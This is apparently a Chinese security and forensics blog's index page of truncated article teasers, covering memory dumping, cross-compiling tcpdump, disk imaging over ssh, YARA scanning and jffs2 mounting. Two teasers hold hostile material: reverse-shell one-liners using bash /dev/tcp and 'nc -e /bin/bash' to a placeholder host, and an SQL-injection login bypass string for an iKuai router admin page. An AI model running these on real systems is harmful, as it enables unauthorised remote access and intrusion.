需求:每小时取一次内存,并传回本地笔记本中。 树莓派版本如下,内存1GB,系统版本Ubuntu,内核版本armv7l arm架构使用lime来转储内存,需要编译模块。浏览编写需要的资源,发现已经有内核src文件了,但缺少头文件,树莓派下的linux_headers安装于其他平台不同,需要使用sudo 阅读全文
交叉编译tcpdump,在树莓派上抓包,用户层交叉编译比较简单。交叉编译器有很多,我们本次采用linaro(http://releases.linaro.org)交叉编译工具。 系统版本:centos7 编译工具:arm-linux-gnueabi wget http://releases.lina 阅读全文
title="登录爱快流控路由" 用户名 "or""=""or""=" 密码无,直接点击登录 阅读全文
centos7版本较低,需要单独编译网卡i40e rpm包:需要安装光盘的rpm文件网卡:i40e-2.4.6.tar.gz驱动包([https://sourceforge.net/projects/e1000/files/i40e%20stable/2.4.6/i40e-2.4.6.tar.gz/ 阅读全文
> Simple IOC and YARA Scanner > 1. 文件名IOC正则表达式匹配完整的文件路径/名称 > 2. Yara规则检查Yara签名匹配文件数据和进程内存 > 3. 哈希检查将已知的恶意哈希(MD5,SHA1,SHA256)与扫描的文件进行比较 > 4. C2连接后检查将进程 阅读全文
一般ssh远程执行命令 ssh root@121.5.106.25 -p 2333 "df -h" 想要dd磁盘镜像到本地只需要加“|”管道符号,举个栗子 镜像/tmp/1.dd ssh root@121.5.106.25 -p 2333 "sudo dd if=/tmp/1.dd" | dd of 阅读全文
1.bash `bash -i >& /dev/tcp/x.x.x.x/port 0>&1` 2.nc -e 反弹 被攻击机` nc -e /bin/bash x.x.x.x port` 攻击机 `nc -lvp port` 3.nc 不带e反弹 ``` mknod /tmp/backpipe p 阅读全文
[https://www.cnblogs.com/hellobao/articles/17261531.html](https://www.cnblogs.com/hellobao/articles/17261531.html) 上回绿盟取证时发现入侵者有部分木马是root权限运行,取证时用的apa 阅读全文
大多数docker为剪裁的nuix系统,很多的命令工具都没有,需要上传静编译好的busybox上传docker cp busybox-i486 8553e459dc85:\tmp与scp命令相似。 1、方法一 root也无权限,因为docker为了保证主机安全,docker开了很多安全设置,禁止pt 阅读全文
# 记录一次jffs2镜像挂载过程 在某IOT设备上取得磁盘镜像文件,jffs2常用在嵌入式Linux系统。现在需要挂载到本地Linux系统,取出文件进行分析。 环境:ubuntu20.4 for ARM # 不建议使用centos 工具:apt install mtd-utils # 也可以源码编 阅读全文
